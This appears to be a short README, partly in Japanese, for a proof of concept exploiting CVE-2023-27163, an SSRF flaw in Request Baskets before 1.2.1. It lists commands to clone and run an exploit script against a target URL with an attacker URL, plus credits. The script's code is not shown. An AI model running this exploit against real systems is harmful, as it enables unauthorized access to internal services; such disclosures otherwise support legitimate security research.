
CVE-2023-27163 - Request Baskets SSRF
Request Baskets SSRF PoC
alt text
Request Baskets バージョン1.2.1未満は、/api/baskets/{name} コンポーネントを介したサーバーサイドリクエストフォージェリ(SSRF)攻撃に対して脆弱です。
git clone https://github.com/rvizx/CVE-2023-27163
cd CVE-2023-27163
chmod +x exploit.sh
./exploit.sh <target_url> <attacker_url>
謝辞:上海交通大学の @beet1e 氏、ならびに山東大学の @chenlibo147 氏、@houqinsheng 氏、[email protected] に感謝します。 記事:https://notes.sjtu.edu.cn/s/MUUhEymt7#